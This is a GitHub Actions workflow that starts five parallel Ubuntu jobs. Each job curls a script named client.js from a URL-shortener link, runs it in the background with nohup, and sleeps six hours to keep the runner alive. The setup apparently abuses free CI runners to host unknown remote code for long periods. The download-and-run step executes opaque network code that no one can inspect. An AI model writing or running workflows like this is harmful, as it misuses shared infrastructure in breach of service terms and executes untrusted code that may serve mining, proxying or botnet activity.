name: Run Node.js Script on Multiple Machines

on:
  workflow_dispatch:

jobs:
  run-node-1:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-2:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-3:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-4:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-5:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat
